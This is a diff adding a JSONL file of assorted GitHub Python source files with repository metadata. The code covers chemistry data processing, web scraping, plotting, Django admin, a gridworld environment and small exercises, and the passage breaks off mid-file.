diff --git "a/3054.jsonl" "b/3054.jsonl" new file mode 100644--- /dev/null +++ "b/3054.jsonl" @@ -0,0 +1,1857 @@ +{"seq_id":"21515613851","text":"import func_lib as f\n\ndef get_file_name(prop, dev):\n return prop + \"_AAD_\" + dev + \"_dev.csv\"\n\nreferences = dict()\n\nfor prop in [\"Pvap\", \"Vsatliq\", \"Vsatvap\"]:\n for dev in [\"abs\", \"rel\"]:\n data_f = open(\"./result/\" + get_file_name(prop, dev), \"r\")\n result_f = open(\"./bycarbon/\" + get_file_name(prop, dev), \"w\")\n for line in data_f.readlines():\n not_processed = True\n while not_processed:\n try:\n # d = deviation\n compound, d, AAD = line.rstrip().split(\",\")\n if not references.get(compound):\n ref_input = input(\"compound: \" + compound + \"\\n\")\n if ref_input == \"\":\n recheck = input(\"Wanna skip? Y/N\" + \"\\n\")\n if recheck == \"Y\":\n references.update({ compound: \"no_ref\" })\n break\n continue\n references.update({ compound: ref_input })\n reference = references.get(compound)\n if reference == \"no_ref\":\n break \n compound_NMR_f = f.get_file(\"./data/\" + compound + \"/NMR_\" + compound + \".csv\")\n compound_NMR = f.get_NMR_arr(compound_NMR_f)\n reference_NMR_f = f.get_file(\"./data/\" + reference + \"/NMR_\" + reference + \".csv\")\n reference_NMR = f.get_NMR_arr(reference_NMR_f)\n print(compound_NMR, \"\\n\", reference_NMR)\n if len(compound_NMR) != len(reference_NMR):\n print(\"REFERENCE INCORRECT: \" + compound + \", \" + reference)\n continue\n carbon1_compound_shift = max(compound_NMR[0], compound_NMR[-1])\n carbon1_reference_shift = reference_NMR[0]\n abs_dev = abs(carbon1_compound_shift - carbon1_reference_shift)\n rel_dev = abs_dev / carbon1_reference_shift\n deviation = abs_dev if dev == \"abs\" else rel_dev\n result_f.write(compound + \",\" + str(deviation) + \",\" + AAD + \"\\n\")\n not_processed = False\n print(\"processed successfully\")\n except:\n not_processed = False\n print(\"unexpected Error\")\n result_f.close()\n data_f.close()","repo_name":"beomseok-kang/ChemEng-MEng-Project-gSAFT-NMRmethod","sub_path":"carbon_1.py","file_name":"carbon_1.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73991365584","text":"import scrapy\n\n\nclass SpecialOffersSpider(scrapy.Spider):\n name = 'special_offers'\n allowed_domains = ['web.archive.org']\n start_urls = ['https://web.archive.org/web/20190225123327/https://www.tinydeal.com/specials.html']\n\n def parse(self, response):\n for product in response.xpath(\"//ul[@class='productlisting-ul']/div/li\"):\n name = product.xpath(\".//a[@class='p_box_title']/text()\").get()\n url = product.xpath(\".//a[@class='p_box_title']/@href\").get()\n discounted_price = product.xpath(\".//span[@class='productSpecialPrice fl']/text()\").get()\n original_price = product.xpath(\".//span[@class='normalprice fl']/text()\").get()\n\n\n\n\n yield{\n 'name': name,\n 'url': url,\n 'discounted price': discounted_price,\n 'original_price': original_price\n }\n\n next = response.xpath(\"//a[@class='nextPage']/@href\").get()\n if (next):\n yield scrapy.Request(url = next, callback = self.parse)\n","repo_name":"derek-shing/scrapy","sub_path":"tinydeal/tinydeal/spiders/special_offers.py","file_name":"special_offers.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5236438485","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom Bio import AlignIO\r\nfrom collections import Counter\r\nimport numpy as np\r\n\r\n\r\nfastas = [\"MLA.msa.relative_to_SR33.50.all.fas\",\r\n \"MLA.msa.relative_to_SR33.50.Sr50.fas\",\r\n \"MLA.msa.relative_to_SR33.50.Sr33.fas\",\r\n \"MLA.msa.relative_to_SR33.50.MLA.fas\",\r\n \"MLA.msa.relative_to_SR33.50.HcMLA.fas\"]\r\n\r\noutput = \"test.out\"\r\n\r\nwith open(output, \"w\") as o:\r\n o.write(\"Position\\tEntropy\\tType\\n\") # Header\r\n for item in fastas: #Iterate each group\r\n fasta_handle = AlignIO.read(item, \"fasta\") # read the MSA\r\n group = item.rsplit(\".\", 2)[1] # group name\r\n \r\n seqs = len(fasta_handle[:, 0]) # Number of sequences\r\n cols = fasta_handle.get_alignment_length() # number of positions in MSA\r\n\r\n \r\n for i in range(cols): #Iterate all positions in the MSA\r\n gaps = fasta_handle[:,i].count(\"-\") # count number of gaps\r\n \r\n if gaps/float(seqs) >= 0.5:\r\n # gaps >= 0.5 -> skip entropy calculation. use 2.000 as a place holder\r\n o.write(f\"{str(i + 1)}\\t2.000\\t{group}\\n\")\r\n \r\n else:\r\n # Adjust the number of sequences after removing the gaps\r\n num_seqs = len(fasta_handle[:, i].replace(\"-\", \"\"))\r\n \r\n # Count amino acids \r\n counts = Counter(fasta_handle[:, i].replace(\"-\", \"\"))\r\n \r\n # Convert to the probabilities \r\n Pi = [ct/float(num_seqs) for ct in counts.values()]\r\n \r\n # Calculate normalized entropy \r\n ent = sum([-1 * p * np.log2(p) / np.log2(20) for p in Pi])\r\n \r\n # Write the output\r\n o.write(f\"{str(i + 1)}\\t{str(ent)}\\t{group}\\n\")\r\n\r\n ","repo_name":"krasileva-group/Sr33-Sr50_analysis","sub_path":"Entropy/Compute_entropy.py","file_name":"Compute_entropy.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31309460006","text":"from base_model import BaseModel\nfrom amount import Amount\nfrom payment_method import PaymentMethod\nfrom order import Order\nfrom split_shipment import SplitShipment\nfrom industry_specific_extensions import IndustrySpecificExtensions\nfrom basket_item import BasketItem\nfrom pt_additional_details import AdditionalDetails\nfrom payment_method import PaymentMethod\n\nclass PrimaryTransaction(BaseModel):\n\n\tATTR = [\n\t\t'transaction_type',\n\t\t'store_id',\n\t\t'client_transaction_id',\n\t\t'basket_items'\n\t]\n\n\tOBJ_ATTR = {\n\t\t'amount' : Amount,\n\t\t'payment_method' : PaymentMethod,\n\t\t'order' : Order,\n\t\t'split_shipment' : SplitShipment,\n\t\t'additional_details' : AdditionalDetails,\n\t\t'industry_specific_extensions' : IndustrySpecificExtensions\n\t}\n\n\tdef __init__(self, params):\n\t\tif 'payment_method' not in params:\n\t\t\tself.set_payment_method(params) \n\t\tself.set_attributes(params)\n\t\tif hasattr(self, 'basket_items'):\n\t\t\tself.set_list_items('basket_items', BasketItem)\n\n\tdef set_payment_method(self, params):\n\t\tif 'payment_card' in params:\n\t\t\tparams['payment_method'] = PaymentMethod({'payment_card' : params['payment_card']})\n\t\telif 'sepa_direct_debit' in params:\n\t\t\tparams['payment_method'] = PaymentMethod({'sepa_direct_debit' : params['sepa_direct_debit']})\n\t\telif 'apple_pay' in params:\n\t\t\tparams['payment_method'] = PaymentMethod({'apple_pay' : params['apple_pay']})","repo_name":"ericmargules/firstdata-python","sub_path":"firstdata/models/primary_transaction.py","file_name":"primary_transaction.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31215013960","text":"from __future__ import print_function\n\n_logging_verbosity = 0\n\n\nclass Logger:\n colors = {\n 'dbg': '\\033[95m',\n 'warn': '\\033[93m\\033[1m',\n 'err': '\\033[91m\\033[1m',\n 'fail': '\\033[41m\\033[30m\\033[1m',\n 'pass': '\\033[42m\\033[30m\\033[1m',\n 'win': '\\033[44m\\033[30m\\033[1m',\n 'wisdom': '\\033[96m\\033[1m',\n 'experience': '\\033[32m\\033[1m',\n 'info': '(i) ',\n 'normal': '\\033[0m'\n }\n\n def __init__(self, verbosity=None):\n if verbosity is not None:\n print(\"Setting verbosity to\", verbosity)\n global _logging_verbosity\n _logging_verbosity = verbosity\n\n def log(self, importance, text):\n global _logging_verbosity\n if importance == 'dbg' and _logging_verbosity < 1:\n return # Don't print debug logs if the code verbosity is low.\n if importance not in self.colors.keys():\n # If the color doesn't exist\n print('error: bad importance %s' % [importance])\n try:\n # Try to write the selected color\n print(self.colors[importance], end='')\n except KeyError as e:\n # If the color doesn't exist, write the error.\n print(e)\n if text.__class__ is tuple:\n # If the text is a tuple:\n print(' '.join([str(x) for x in text])\n .replace('\\\\n', '\\n'), end='')\n else:\n # If the text isn't a tuple, just write it.\n print(text, end=\"\")\n print(self.colors['normal'])\n\n def line(self):\n # Print a newline.\n print()\n","repo_name":"koans-for-pebble/koans-for-pebble","sub_path":"koan_lib/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42043528258","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 1 14:06:34 2019\n\n@author: dieter\n\"\"\"\n\n\n\n\nimport numpy\nimport pandas\n\ndata = pandas.read_csv('PoliceForce.csv', parse_dates=['INCIDENT_DATE'])\n\ndates = data['INCIDENT_DATE']\nyear = dates.dt.year\ndata['year'] = year\n\ngrp = data.groupby(['OFFICER_GENDER', 'SUBJECT_GENDER'])\ncnt = grp.DISTRICT.count()\ncnt = cnt.reset_index()\n\ntotal = len(data)\ngender_officers = data.OFFICER_GENDER.value_counts() / total\ngender_subjects = data.SUBJECT_GENDER.value_counts() / total\np = numpy.outer(gender_officers.values, gender_subjects.values) * total\n\n# officer_subject\nm_m = p[0, 0]\nf_m = p[1, 0]\no_m = p[2, 0]\n\nm_f = p[0, 1]\nf_f = p[1, 1]\no_f = p[2, 1]\n\nm_o = p[0, 2]\nf_o = p[1, 2]\no_o = p[2, 2]\n\nnorm = [f_f, f_m, f_o, m_f, m_m, m_o, o_f, o_m]\n\ncnt['norm'] = norm\n\ncnt['ratio'] = cnt['DISTRICT'] / cnt['norm']\n\ntable = cnt.pivot(index='OFFICER_GENDER', columns='SUBJECT_GENDER', values='ratio')\ntable = table.iloc[0:2, 0:2]\n\nprint(table)\n\n#%%\nfrom matplotlib import pyplot\n\nfor x in data.columns: print(x)\n\ngrp = data.groupby('DISTRICT')\ncnt = grp.count()\n\ncnt = cnt.reset_index()\ncnt = cnt.sort_values(by='INCIDENT_NO', ascending=False)\n\npyplot.figure(figsize=(12,10))\npyplot.bar(range(15), cnt['INCIDENT_NO'])\npyplot.xticks(range(15), cnt['DISTRICT'], rotation=90)\n\npyplot.show()\n\n##\ndistrict1 = data.query('DISTRICT == \"DISTRICT 1\"')\ngrp = data.groupby('INCIDENT_TYPE')\ncnt = grp.count()\ncnt = cnt.reset_index()\n\nnr = cnt['INCIDENT_NO']\nsm = nr.sum()\n\nnr = nr/sm\n#%%\n\nexplode = nr.size * [0]\nexplode[5] = 0.25\n\npyplot.figure(figsize=(6,3))\npyplot.subplot(1,2,1)\npatches, texts = pyplot.pie(nr, explode=explode)\npyplot.subplot(1,2,2)\npyplot.box(False)\npyplot.axis('off')\npyplot.legend(patches, ['asssssssssssssssssssssssssss','b','c','d','e','f'], loc=\"right\")\npyplot.show()\n\n#%%","repo_name":"dvanderelst/GradStats","sub_path":"DataScenarios/scenario_PoliceForce/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15421122957","text":"import glob\nimport os\n\nfrom cffi import FFI\n\n\ninclude_dirs = [os.path.join('libraries', 'Rmath', 'src'),\n os.path.join('libraries', 'Rmath', 'include')]\n\nrmath_src = glob.glob(os.path.join('libraries', 'Rmath', 'src', '*.c'))\n\n# Take out dSFMT dependant files\nrmath_src = [f for f in rmath_src if 'librandom.c' not in f]\nrmath_src = [f for f in rmath_src if 'randmtzig.c' not in f]\n\nextra_compile_args = ['-DMATHLIB_STANDALONE', '-std=c99']\n\nffi = FFI()\nffi.set_source('_rmath_ffi', '#include ',\n include_dirs=include_dirs,\n sources=rmath_src,\n libraries=[],\n extra_compile_args=extra_compile_args)\n\nffi.cdef('''\\\ndouble pnorm(double, double, double, int, int);\ndouble qnorm(double, double, double, int, int);\ndouble runif(double, double);\nvoid set_seed(unsigned int, unsigned int);\n''')\n\nif __name__ == '__main__':\n ffi.compile(verbose=True)\n","repo_name":"synapticarbors/numba_cffi_bug","sub_path":"build_rmath.py","file_name":"build_rmath.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6351362854","text":"from django import template\nfrom django.conf import settings\n\nfrom kubeportal.k8s import kubernetes_api as api\n\nregister = template.Library()\n\n\n@register.simple_tag\ndef apiserver():\n return api.get_apiserver()\n\n\n@register.simple_tag\ndef settings_value(name):\n return getattr(settings, name, \"\")\n\n\n@register.simple_tag\ndef settings_value_normalized(name):\n val = getattr(settings, name, \"\")\n return val.lower().replace(' ', '_')\n\n\n@register.simple_tag(takes_context=True)\ndef placeholder_replace(context, text):\n if text is None:\n return \"\"\n\n try:\n ns = context.request.user.service_account.namespace.name\n svc = context.request.user.service_account.name\n except:\n ns = \"\"\n svc = \"\"\n with_ns = text.replace(\"{{namespace}}\", ns)\n with_both = with_ns.replace(\"{{serviceaccount}}\", svc)\n return with_both\n","repo_name":"kubeportal/kubeportal","sub_path":"kubeportal/templatetags/frontend_tags.py","file_name":"frontend_tags.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"70900923666","text":"from typing import Optional\n\nimport numpy.random as rnd\n\nfrom gym_gridverse.action import Action\nfrom gym_gridverse.agent import Agent\nfrom gym_gridverse.design import draw_room, draw_wall_boundary\nfrom gym_gridverse.envs.reset_functions import reset_function_registry\nfrom gym_gridverse.envs.reward_functions import reward_function_registry\nfrom gym_gridverse.envs.terminating_functions import (\n terminating_function_registry,\n)\nfrom gym_gridverse.envs.transition_functions import transition_function_registry\nfrom gym_gridverse.geometry import Area, Orientation\nfrom gym_gridverse.grid import Grid\nfrom gym_gridverse.grid_object import Color, Floor, GridObject, Wall\nfrom gym_gridverse.rng import choice, get_gv_rng_if_none\nfrom gym_gridverse.state import State\n\n\nclass Coin(GridObject):\n state_index = 0\n color = Color.NONE\n blocks_movement = False\n blocks_vision = False\n holdable = False\n\n @classmethod\n def can_be_represented_in_state(cls) -> bool:\n return True\n\n @classmethod\n def num_states(cls) -> int:\n return 1\n\n def __repr__(self):\n return f'{self.__class__.__name__}()'\n\n\n@reset_function_registry.register\ndef coin_maze(*, rng: Optional[rnd.Generator] = None) -> State:\n \"\"\"creates a maze with collectible coins\"\"\"\n\n # must call this to include reproduceable stochasticity\n rng = get_gv_rng_if_none(rng)\n\n # initializes grid with Coin\n grid = Grid.from_shape((7, 9), factory=Coin)\n # assigns Wall to the border\n draw_wall_boundary(grid)\n # draw other walls\n draw_room(grid, Area((2, 4), (2, 6)), Wall)\n # re-assign openings\n grid[2, 3] = Coin()\n grid[4, 5] = Coin()\n\n # final result (#=Wall, .=Coin):\n\n # #########\n # #.......#\n # #.W.WWW.#\n # #.W...W.#\n # #.WWW.W.#\n # #.......#\n # #########\n\n # randomized agent position and orientation\n agent_position = choice(\n rng,\n [\n position\n for position in grid.area.positions()\n if isinstance(grid[position], Coin)\n ],\n )\n agent_orientation = choice(rng, list(Orientation))\n agent = Agent(agent_position, agent_orientation)\n\n # remove coin from agent initial position\n grid[agent.position] = Floor()\n\n return State(grid, agent)\n\n\n@transition_function_registry.register\ndef collect_coin_transition(\n state: State,\n action: Action,\n *,\n rng: Optional[rnd.Generator] = None,\n):\n \"\"\"collects and removes coins\"\"\"\n if isinstance(state.grid[state.agent.position], Coin):\n state.grid[state.agent.position] = Floor()\n\n\n@reward_function_registry.register\ndef collect_coin_reward(\n state: State,\n action: Action,\n next_state: State,\n *,\n reward: float = 1.0,\n rng: Optional[rnd.Generator] = None,\n):\n \"\"\"gives reward if a coin was collected\"\"\"\n return (\n reward\n if isinstance(state.grid[next_state.agent.position], Coin)\n else 0.0\n )\n\n\n@terminating_function_registry.register\ndef no_more_coins(\n state: State,\n action: Action,\n next_state: State,\n *,\n rng: Optional[rnd.Generator] = None,\n):\n \"\"\"terminates episodes if all coins are collected\"\"\"\n return not any(\n isinstance(next_state.grid[position], Coin)\n for position in next_state.grid.area.positions()\n )\n","repo_name":"abaisero/gym-gridverse","sub_path":"examples/coin_env.py","file_name":"coin_env.py","file_ext":"py","file_size_in_byte":3314,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"48"} +{"seq_id":"36369817984","text":"############################################################\r\n# Name: Jonathan Carbonneau\r\n# CS115 HW#\r\n# \r\n# Pledge: I pledge my honor that i have abbided by the stevens honor system\r\n############################################################\r\n\r\nimport random\r\n# change finds the least amount of coins to make a money ammount\r\ndef change(amount, coins):\r\n coins.sort(reverse=True) #sorts em big to small\r\n n = len(coins)\r\n maxbound = coins[n - 1] * amount + 1# this is the deapest it shold serch\r\n best = maxbound\r\n\r\n def depthFirstSearch(index, total, level):\r\n nonlocal best\r\n if total == amount:\r\n best = min(best, level)\r\n return\r\n for i in range(index, n):# creats 3 new nodes\r\n coin = coins[i]\r\n if coin <= amount - total < coin * (best - level):#stops if it is deaper best depth\r\n depthFirstSearch(i, total + coin, level + 1)\r\n depthFirstSearch(0, 0, 0)\r\n if best != maxbound:\r\n return best\r\n return -1\r\n#print(change(313,[7,24,42]))\r\n\r\n\r\n#currency will produce a number long list of random numbers less than 10\r\ndef currency(number):\r\n #genarates a list with random numbers\r\n listgen = lambda x: listgen(x-1) + [random.randrange(10)] if x > 1 else [random.randrange(10)]\r\n #removes dupicates and adds random numbers till it gets to number long\r\n filterRandomList = lambda randomList: filterRandomList(list(set(randomList)) + [random.randrange(10)]) if len(randomList) > len(set(randomList)) or len(set(randomList)) != number else randomList\r\n return filterRandomList(listgen(number))\r\n\r\n#print(currency(4))\r\n\r\n","repo_name":"JonathanCarbonneau/Least-Amount-Of-Coins","sub_path":"hw4.py","file_name":"hw4.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10532478270","text":"from django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin\nfrom django.contrib.auth.forms import UserChangeForm\nfrom django.utils.translation import gettext_lazy as _\n\nfrom django_ai.supervised_learning.admin import \\\n HGBTreeClassifierAdmin, SVCAdmin\n\nfrom .models import (\n CurrentClassifier, DecisionTree, ExternalClassifier, NetworkErrorLog,\n NetworkNode, SVM, User, )\n\n\nclass CovidHTUserChangeForm(UserChangeForm):\n\n class Meta(UserChangeForm.Meta):\n model = User\n\n\nclass CovidHTUserAdmin(UserAdmin):\n\n form = CovidHTUserChangeForm\n list_display = (\n 'unit',\n 'user_type', 'username', 'email', 'name',\n 'is_active', 'date_joined', 'is_staff'\n )\n list_display_links = ('username', )\n list_filter = (\n 'unit',\n 'user_type', ) + UserAdmin.list_filter\n fieldsets = (\n (None, {'fields': (\n 'unit',\n 'user_type',)}),\n ) + UserAdmin.fieldsets\n\n\nadmin.site.register(User, CovidHTUserAdmin)\n\n\n@admin.register(CurrentClassifier)\nclass CurrentClassifierAdmin(admin.ModelAdmin):\n\n fieldsets = (\n (_(\"Local Classifier\"), {\n 'fields': (\n ('classifier', 'external'),\n ),\n }),\n (_(\"Network Voting\"), {\n 'fields': (\n ('network_voting', ),\n ('breaking_ties_policy',),\n ('network_voting_threshold',),\n ),\n }),\n )\n\n def change_view(self, request, object_id, form_url='', extra_context=None):\n extra_context = extra_context or {}\n extra_context[\"nodes\"] = NetworkNode.objects.all()\n return super().change_view(\n request, object_id, form_url, extra_context=extra_context\n )\n\n\n@admin.register(ExternalClassifier)\nclass ExternalClassifierAdmin(admin.ModelAdmin):\n fieldsets = (\n (_(\"General\"), {\n 'fields': (\n ('name', ),\n ('service_url', ),\n ),\n }),\n (_(\"Users\"), {\n 'fields': (\n ('remote_user', 'remote_user_token'),\n ),\n }),\n (_(\"Classification Service\"), {\n 'fields': (\n ('metrics',),\n ),\n }),\n (_(\"Timeout\"), {\n 'classes': ('collapse',),\n 'fields': (\n ('timeout',),\n ),\n }),\n (_(\"Endpoints\"), {\n 'classes': ('collapse',),\n 'fields': (\n ('endpoint_classify', 'endpoint_classify_dataset'),\n ),\n }),\n (_(\"Other\"), {\n 'classes': ('collapse',),\n 'fields': (\n ('metadata',),\n ),\n }),\n )\n readonly_fields = ['metadata', ]\n\n\n@admin.register(DecisionTree)\nclass DecisionTreeAdmin(HGBTreeClassifierAdmin):\n pass\n\n\n@admin.register(SVM)\nclass SVMAdmin(SVCAdmin):\n pass\n\n\n@admin.register(NetworkNode)\nclass NetworkNodeAdmin(admin.ModelAdmin):\n fieldsets = (\n (_(\"General\"), {\n 'fields': (\n ('name', ),\n ('service_url', ),\n ),\n }),\n (_(\"Users\"), {\n 'fields': (\n ('unit', 'user',),\n ('remote_user', 'remote_user_token'),\n ),\n }),\n (_(\"Data Sharing\"), {\n 'fields': (\n ('data_sharing_is_enabled',),\n ('data_sharing_mode',),\n ),\n }),\n (_(\"Classification Service\"), {\n 'fields': (\n ('classification_request', ),\n ('metrics',),\n ),\n }),\n (_(\"Timeout\"), {\n 'classes': ('collapse',),\n 'fields': (\n ('timeout',),\n ),\n }),\n (_(\"Endpoints\"), {\n 'classes': ('collapse',),\n 'fields': (\n ('endpoint_data',),\n ('endpoint_classify', 'endpoint_classify_dataset'),\n ),\n }),\n (_(\"Other\"), {\n 'classes': ('collapse',),\n 'fields': (\n ('metadata',),\n ),\n }),\n )\n readonly_fields = ['metadata', ]\n\n\n@admin.register(NetworkErrorLog)\nclass NetworkErrorLogAdmin(admin.ModelAdmin):\n pass\n","repo_name":"math-a3k/covid-ht","sub_path":"base/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":4285,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"4089678102","text":"print(\"Hello \", end=\"\")\nprint(\"World!\")\nprint(\"Cat\", \"Dog\", 'Mice', sep= \",\")\nAge = 0\nstuff = 0\ndef Brian_Function():\n global Age\n if inputs == \"brian\":\n Age = Age + 1\n print(\"Brian Count: \"+str(Age))\n else:\n print(\"Not Brian\")\ndef Chloe_Function():\n print(inputs)\n if inputs == \"chloe\":\n Age = Age + 1\n print(\"Chloe Count: \"+str(Age))\n else:\n print(\"Not Chloe\")\n\ndef main():\n print(\"VOTE BRIAN FOR PRESIDENT! CHLOE SHMOE!!! Actually, I couldn't find any rhymes for Chloe Stinks.\")\n print(\"VOTE CHLOE FOR PRESIDENT! BRIAN IS LYIN!!!! Actually, I couldn't find any rhymes for Brian Stinks.\")\n\n while stuff == 0:\n inputs = input(\"Print Brian, the handsome knight, or Chloe, the dog: \")\n inputs = inputs.lower()\n if inputs == \"brian\":\n Brian_Function()\n if inputs == \"chloe\":\n Chloe_Function()\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"briangao892/Brian2022SummerPythonCode","sub_path":"print.py","file_name":"print.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34588010483","text":"from dotenv import load_dotenv\nfrom os import getenv\nfrom datetime import datetime\nfrom django.core.cache import cache\nimport praw\n# import pprint\n\n\ndef get_messages(count=16):\n \"\"\"\n Get specified messages from the reddit\n :param count: The total amount of messages to get\n :type amount: int\n \"\"\"\n\n load_dotenv()\n\n reddit = praw.Reddit(\n client_id=getenv(\"REDDIT_CLIENT_ID\"),\n client_secret=getenv(\"REDDIT_CLIENT_SECRET\"),\n refresh_token=getenv(\"REDDIT_REFRESH_TOKEN\"),\n user_agent=getenv(\"REDDIT_USER_AGENT\"),\n )\n\n result = []\n\n subreddit: praw.reddit.Subreddit = reddit.subreddit(\"transplace\")\n for submission in subreddit.new(limit=count):\n # In case I ever need to figure out\n # all the properties a submission has\n # pprint.pprint(vars(submission))\n\n if submission.archived:\n print(submission.title, \"ARCHIVED\")\n continue\n\n data = {\n \"id\": submission.id,\n \"title\": submission.title,\n \"content\": None,\n \"message_type\": \"User Content\",\n \"reddit_url\": submission.shortlink,\n \"created_at\": datetime.utcfromtimestamp(submission.created_utc)\n }\n\n # If the post is an image post\n # We have to do it this way bc PRAW does funny stuff\n try:\n\n if submission.preview[\"enabled\"]:\n data[\"file_url\"] = submission.url\n\n if \"video\" in submission.post_hint:\n data[\"file_url\"] = submission.preview[\"images\"][0][\"resolutions\"][-1][\"url\"]\n\n except BaseException as e:\n pass\n\n result.append(data)\n\n # 🙏\n cache.set(\"posts\", result)\n\n # For convenience\n return result\n\n# get_messages()\n","repo_name":"SqueakyBeaver/TransPlace-Site","sub_path":"reddit/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42198461641","text":"from gene_models import model_processed\nfrom postprocessor_trim import PostprocessorTrim \n\nDATA_SURVIVORS_PATH = '../data/processed/survivors'\nDATA_DECEASED_PATH = '../data/processed/deceased'\n\nDESTINATION_SURVIVORS_PATH = '../data/trimmed/survivors'\nDESTINATION_DECEASED_PATH = '../data/trimmed/deceased'\n\nmodel_type = model_processed\ndeceased_cutoff = 50. # 17. # smaller sample--less variation close to the median\nsurvivors_cutoff = 50. # 50. \n\nexpression_count_floor = 300\n\nsurvivors_processor = PostprocessorTrim(model_type, DATA_SURVIVORS_PATH, DESTINATION_SURVIVORS_PATH, survivors_cutoff, expression_count_floor)\ndeceased_processor = PostprocessorTrim(model_type, DATA_DECEASED_PATH, DESTINATION_DECEASED_PATH, deceased_cutoff, expression_count_floor)\n\ndeceased_processor.trim_outliers()\nsurvivors_processor.trim_outliers()\n\n\n\n","repo_name":"rcoppy/oncogene-analysis","sub_path":"preprocessing/trimming.py","file_name":"trimming.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12263493351","text":"'''\r\nCreated on Sep 1, 2019\r\n\r\n@author: Ricardo Sanchez\r\n'''\r\nimport sys # command line arguments\r\nimport os # checking if file exists\r\n \r\n#Checking initial conditions (Samples taken from wordCountTest) \r\nif len(sys.argv) is not 3:\r\n print(\"Correct usage: wordCount.py \")\r\n exit()\r\n\r\ninputFname = sys.argv[1]\r\noutputFname = sys.argv[2]\r\n\r\n#make sure input file exist\r\nif not os.path.exists(inputFname):\r\n print (\"text file input %s doesn't exist! Exiting\" % inputFname)\r\n exit()\r\n \r\n#make sure output file exists\r\nif not os.path.exists(outputFname):\r\n print (\"wordCount output file %s doesn't exist! Exiting\" % outputFname)\r\n exit()\r\n\r\n\r\n#open file and create initial list of words\r\nopen_file = open(inputFname, \"r\")\r\nstri= \"\"\r\n\r\nfor line in open_file:\r\n stri+=line \r\nword_stri = stri.split()\r\nopen_file.close()\r\n\r\n\r\n#punctuation and sorting of words\r\ncount = 0\r\nwhile count < len(word_stri):\r\n if \",\" in word_stri[count] or \".\" in word_stri[count] or \":\" in word_stri[count] or \";\" in word_stri[count]:\r\n word_stri[count] = word_stri[count].translate({ord(i): None for i in ',.:;'})\r\n if \"--\" in word_stri[count]:\r\n word_stri[count] = word_stri[count].replace('--', '-')\r\n if \"-\" in word_stri[count]:\r\n word_stri.append(word_stri[count].split('-')[1])\r\n word_stri[count] = word_stri[count].split('-')[0]\r\n word_stri[count] = word_stri[count].lower()\r\n count += 1\r\nword_stri.sort()\r\n\r\n#count of words\r\nnewList =[]\r\nindex = 0\r\ncurCount = 0\r\ntempString =\"\"\r\nwhile index < len(word_stri):\r\n curCount = word_stri.count(word_stri[index])\r\n tempString = word_stri[index] + \" \" + str(curCount)\r\n newList.append(tempString) \r\n index += curCount\r\n \r\n#writing output file\r\nwith open(outputFname, 'w') as f:\r\n for item in newList:\r\n f.write(\"%s\\n\" % item)\r\n","repo_name":"os-utep-master/python-intro-rasanchez7","sub_path":"wordCount.py","file_name":"wordCount.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"852448717","text":"import json\r\n\r\nclass Employee:\r\n def __init__(self,eno,ename,esal,eaddr):\r\n self.eno = eno\r\n self.ename = ename\r\n self.esal= esal\r\n self.eaddr = eaddr\r\n def display(self):\r\n print('E-NO:{},E-NAME:{},E-SAL:{},E-ADDR:{}'.format(self.eno,self.ename,\r\n self.esal,self.eaddr))\r\n","repo_name":"harishramuk/python-handson-exercises","sub_path":"empobject406.py","file_name":"empobject406.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17245857556","text":"\r\nfrom re import X\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nclass ProjectileDrop():\r\n def __init__(self, h, v_x):\r\n self.h0 = h\r\n self.v_x = v_x\r\n print('Objekt uspješno stvoren. Visina objekta je:', self.h0, 'm, brzina objekta je:', self.v_x, 'm/s.')\r\n\r\n def promijeniVisinu(self, h_new):\r\n self.h0 = h_new\r\n return self.h0\r\n \r\n def promijeniBrzinu(self, v_new):\r\n self.v_x = self.v_x + v_new \r\n return self.v_x\r\n\r\n def dropProjectile(self, dt=0.01, vjetar = 0):\r\n self.x = [0]\r\n self.a_x = vjetar\r\n self.vx_projektila = [self.v_x]\r\n self.h = [self.h0]\r\n self.vy = [0]\r\n self.t = [0]\r\n g = 9.81 #m/s^2\r\n\r\n while self.h[-1]>0:\r\n self.x.append(self.x[-1]+self.vx_projektila[-1]*dt)\r\n 